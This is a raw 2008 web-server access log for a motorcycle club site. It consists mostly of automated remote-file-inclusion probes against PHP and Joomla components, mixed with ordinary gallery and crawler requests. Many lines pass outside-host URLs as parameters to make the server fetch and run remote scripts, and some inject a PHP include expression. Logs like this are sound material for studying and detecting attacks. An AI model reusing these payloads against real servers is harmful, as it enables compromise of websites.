70.38.38.231 - - [26/Oct/2008:10:12:37 -0700] "GET /logs/access_080510.log//index.php?option=com_custompages&cpage=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.38.38.231 - - [26/Oct/2008:10:12:38 -0700] "GET /index.php?option=com_custompages&cpage=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 200 95023 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:12:40 -0700] "GET /logs/access_080830.log/errors.php?error=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:12:41 -0700] "GET /errors.php?error=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.215.50 - - [26/Oct/2008:10:12:41 -0700] "GET /logs/errors.php?error=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.32.215.50 - - [26/Oct/2008:10:12:41 -0700] "GET /logs/access_080723.log/errors.php?error=http://www.geocities.com/kamtiez_family2000/kontol.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.210.42.40 - - [26/Oct/2008:10:12:45 -0700] "GET /logs/access_080830.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.silberpfeile.de/news/inc/image.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
195.210.42.40 - - [26/Oct/2008:10:12:45 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.silberpfeile.de/news/inc/image.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
195.210.42.40 - - [26/Oct/2008:10:12:45 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.silberpfeile.de/news/inc/image.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
74.6.22.185 - - [26/Oct/2008:10:12:48 -0700] "GET /blog/wp-login.php HTTP/1.0" 200 1844 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
203.146.15.54 - - [26/Oct/2008:10:12:49 -0700] "GET /logs//common/db.php?commonpath=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
203.146.15.54 - - [26/Oct/2008:10:12:49 -0700] "GET /common/db.php?commonpath=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
203.146.15.54 - - [26/Oct/2008:10:12:49 -0700] "GET /logs/access_080326.log//common/db.php?commonpath=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:10:12:49 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-011_0.jpg HTTP/1.1" 200 398483 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
72.199.235.196 - - [26/Oct/2008:10:12:55 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-133_1.jpg HTTP/1.1" 200 363012 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
203.146.15.54 - - [26/Oct/2008:10:12:57 -0700] "GET /logs/access_080606.log//common/db.php?commonpath=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:13:02 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-109_1.jpg HTTP/1.1" 200 340300 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
195.210.42.40 - - [26/Oct/2008:10:13:12 -0700] "GET /logs/access_080620.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.silberpfeile.de/news/inc/image.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
66.79.163.110 - - [26/Oct/2008:10:13:14 -0700] "GET /errors.php?error=http://mobart.ee/modules/readmes? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.148.160.16 - - [26/Oct/2008:10:13:16 -0700] "GET /logs/access_080510.log//index.php?option=com_custompages&cpage=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:13:17 -0700] "GET /index.php?option=com_custompages&cpage=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 200 95007 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:10:13:35 -0700] "GET /logs/access_080607.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:10:13:39 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:10:13:39 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:10:13:44 -0700] "GET /blog/wp-content/gallery/2008-mountain-calstoc/059.jpg HTTP/1.1" 200 281738 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:13:50 -0700] "GET /logs/access_080615.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
195.149.118.74 - - [26/Oct/2008:10:14:07 -0700] "GET /logs/access_080927.log//errors.php?error=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.122.36.10 - - [26/Oct/2008:10:14:07 -0700] "GET /logs/access_080614.log//modules/vwar/admin/admin.php?vwar_root=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.3.194.35 - - [26/Oct/2008:10:14:11 -0700] "GET /logs/access_081008.log/errors.php?error=http://www.newminiclub.nl/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.3.194.35 - - [26/Oct/2008:10:14:11 -0700] "GET /logs/errors.php?error=http://www.newminiclub.nl/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.3.194.35 - - [26/Oct/2008:10:14:12 -0700] "GET /logs/access_080830.log/errors.php?error=http://www.newminiclub.nl/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:14:12 -0700] "GET /logs/errors.php?error=http://www.newminiclub.nl/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.3.194.35 - - [26/Oct/2008:10:14:12 -0700] "GET /logs/access_080723.log/errors.php?error=http://www.newminiclub.nl/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:14:22 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-003.jpg HTTP/1.1" 200 495862 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:14:25 -0700] "GET /logs/access_080510.log//index.php?option=com_custompages&cpage=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:14:29 -0700] "GET /index.php?option=com_custompages&cpage=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 200 95007 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:14:30 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:14:35 -0700] "GET /logs/access_080510.log//index.php?option=com_custompages&cpage=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.233.172.64 - - [26/Oct/2008:10:14:36 -0700] "GET /dbase.php?action=http://www.snack-bee.de/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:14:36 -0700] "GET /index.php?option=com_custompages&cpage=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 200 95023 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:14:36 -0700] "GET /logs//index.php?option=com_custompages&cpage=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:14:37 -0700] "GET /logs/access_080329.log//index.php?option=com_custompages&cpage=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:14:41 -0700] "GET /logs/index3.php?p=http://www.ordosvip.ru/images/alb.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
69.64.72.12 - - [26/Oct/2008:10:14:41 -0700] "GET /index3.php?p=http://www.ordosvip.ru/images/alb.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
87.233.172.64 - - [26/Oct/2008:10:14:44 -0700] "GET /logs/access_080717.log/dbase.php?action=http://www.snack-bee.de/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [26/Oct/2008:10:14:47 -0700] "GET /logs/access_080326.log//common/db.php?commonpath=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [26/Oct/2008:10:14:48 -0700] "GET /common/db.php?commonpath=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [26/Oct/2008:10:14:48 -0700] "GET /logs//common/db.php?commonpath=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.246.187.54 - - [26/Oct/2008:10:14:49 -0700] "GET /logs/access_080329.log//index.php?option=com_custompages&cpage=http://www.annunciora.it/images/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.72.12 - - [26/Oct/2008:10:15:00 -0700] "GET /logs/access_080127.log/index3.php?p=http://www.ordosvip.ru/images/alb.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
69.64.72.12 - - [26/Oct/2008:10:15:00 -0700] "GET /index3.php?p=http://www.ordosvip.ru/images/alb.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
69.64.72.12 - - [26/Oct/2008:10:15:00 -0700] "GET /logs/index3.php?p=http://www.ordosvip.ru/images/alb.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
203.151.232.108 - - [26/Oct/2008:10:15:00 -0700] "GET /logs/access_080920.log//frame.php?framefile=http://www.n0ne.moda-ok.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:15:01 -0700] "GET /?show=gallery&pageid=159 HTTP/1.0" 200 166118 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
195.3.194.35 - - [26/Oct/2008:10:15:04 -0700] "GET /logs/errors.php?error=http://www.newminiclub.nl/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.3.194.35 - - [26/Oct/2008:10:15:04 -0700] "GET /logs/access_080830.log/errors.php?error=http://www.newminiclub.nl/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:15:06 -0700] "GET /logs/access_080723.log/errors.php?error=http://www.newminiclub.nl/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:15:07 -0700] "GET /logs//language.inc.php?langs_dir=http://www.julmy.org/genealogie/mouse.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
68.122.36.10 - - [26/Oct/2008:10:15:07 -0700] "GET /logs/access_080901.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:15:07 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:15:07 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.126.46.141 - - [26/Oct/2008:10:15:07 -0700] "GET /language.inc.php?langs_dir=http://www.julmy.org/genealogie/mouse.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.146.15.54 - - [26/Oct/2008:10:15:11 -0700] "GET /common/db.php?commonpath=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:15:13 -0700] "GET /logs/errors.php?error=http://www.newminiclub.nl/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.3.194.35 - - [26/Oct/2008:10:15:13 -0700] "GET /logs/access_080830.log%20%20/errors.php?error=http://www.newminiclub.nl/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:10:15:14 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0041.jpg HTTP/1.1" 200 416115 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:15:16 -0700] "GET /logs/access_080723.log%20%20/errors.php?error=http://www.newminiclub.nl/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.149.118.74 - - [26/Oct/2008:10:15:25 -0700] "GET /logs/access_080925.log//errors.php?error=http://sfunion.com/echot/data/action/act.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.3.194.35 - - [26/Oct/2008:10:15:39 -0700] "GET /logs/access_080830.log/errors.php?error=http://www.newminiclub.nl/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:10:15:39 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0129.jpg HTTP/1.1" 200 467243 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
203.146.15.54 - - [26/Oct/2008:10:15:50 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
203.146.15.54 - - [26/Oct/2008:10:15:50 -0700] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:15:50 -0700] "GET /logs/access_080627.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:15:59 -0700] "GET /logs/access_080606.log//common/db.php?commonpath=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.3.194.35 - - [26/Oct/2008:10:16:02 -0700] "GET /logs/errors.php?error=http://www.newminiclub.nl/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:10:16:05 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-098_1.jpg HTTP/1.1" 200 427037 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
74.6.22.187 - - [26/Oct/2008:10:16:06 -0700] "GET /bikes/dteel/DesertSTOC07/?N=A HTTP/1.0" 200 7603 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
123.214.171.33 - - [26/Oct/2008:10:16:06 -0700] "GET /logs/access_080808.log/index3.php?d=http://www.ordosvip.ru/images/alb.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:16:06 -0700] "GET /index3.php?d=http://www.ordosvip.ru/images/alb.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
123.214.171.33 - - [26/Oct/2008:10:16:07 -0700] "GET /logs/index3.php?d=http://www.ordosvip.ru/images/alb.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:10:16:08 -0700] "GET /logs/access_080607.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:10:16:09 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:16:09 -0700] "GET /logs/access_080615.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:16:13 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
203.146.15.54 - - [26/Oct/2008:10:16:23 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:16:23 -0700] "GET /logs/access_080216.log//faqsupport/samplefaqsupport.php?path[docroot]=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:16:23 -0700] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
72.199.235.196 - - [26/Oct/2008:10:16:30 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-015.jpg HTTP/1.1" 200 424706 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
61.250.83.231 - - [26/Oct/2008:10:16:41 -0700] "GET /logs/index3.php?c=http://www.ordosvip.ru/images/alb.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.250.83.231 - - [26/Oct/2008:10:16:42 -0700] "GET /index3.php?c=http://www.ordosvip.ru/images/alb.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.146.15.54 - - [26/Oct/2008:10:16:54 -0700] "GET /logs/access_080629.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:16:56 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-060.jpg HTTP/1.1" 200 527475 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3" "dmulk.com"
68.122.36.10 - - [26/Oct/2008:10:16:56 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.designet-dz.com//filtrans/plugins/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:17:02 -0700] "GET /logs/access_080830.log/errors.php?error=http://www.newminiclub.nl/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.3.194.35 - - [26/Oct/2008:10:17:02 -0700] "GET /logs/access_080723.log/errors.php?error=http://www.newminiclub.nl/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.146.15.54 - - [26/Oct/2008:10:17:13 -0700] "GET /logs/access_080731.log//faqsupport/samplefaqsupport.php?path[docroot]=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
195.225.105.52 - - [26/Oct/2008:10:17:17 -0700] "GET /logs/access_080109.log/include/print_category.php?setup[use_category]=http://www.herbsall.4yz.com/images/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.225.105.52 - - [26/Oct/2008:10:17:17 -0700] "GET /include/print_category.php?setup[use_category]=http://www.herbsall.4yz.com/images/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:17:17 -0700] "GET /logs/include/print_category.php?setup[use_category]=http://www.herbsall.4yz.com/images/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:10:17:25 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:10:17:25 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:10:17:26 -0700] "GET /logs/access_080607.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
85.92.87.42 - - [26/Oct/2008:10:17:32 -0700] "GET /logs/access_080601.log//common/db.php?commonpath=http://www.asa-auto.ba/mambo/cache/v6id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:17:32 -0700] "GET /common/db.php?commonpath=http://www.asa-auto.ba/mambo/cache/v6id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
85.92.87.42 - - [26/Oct/2008:10:17:32 -0700] "GET /logs//common/db.php?commonpath=http://www.asa-auto.ba/mambo/cache/v6id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:17:34 -0700] "GET /logs/access_080601.log//common/db.php?commonpath=http://www.asa-auto.ba/mambo/cache/v6id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
85.92.87.42 - - [26/Oct/2008:10:17:34 -0700] "GET /logs//common/db.php?commonpath=http://www.asa-auto.ba/mambo/cache/v6id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
85.92.87.42 - - [26/Oct/2008:10:17:34 -0700] "GET /common/db.php?commonpath=http://www.asa-auto.ba/mambo/cache/v6id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:10:17:35 -0700] "GET /logs/access_080615.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
85.92.87.42 - - [26/Oct/2008:10:17:49 -0700] "GET /logs/access_080315.log//common/db.php?commonpath=http://www.asa-auto.ba/mambo/cache/v6id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
85.92.87.42 - - [26/Oct/2008:10:17:55 -0700] "GET /logs/access_080315.log//common/db.php?commonpath=http://www.asa-auto.ba/mambo/cache/v6id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:10:18:00 -0700] "GET /logs/access_081011.log/include/print_category.php?setup[use_category]=http://www.herbsall.4yz.com/images/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.218.85.18 - - [26/Oct/2008:10:18:11 -0700] "GET /logs/access_080607.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.stormpages.com/arale/child/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
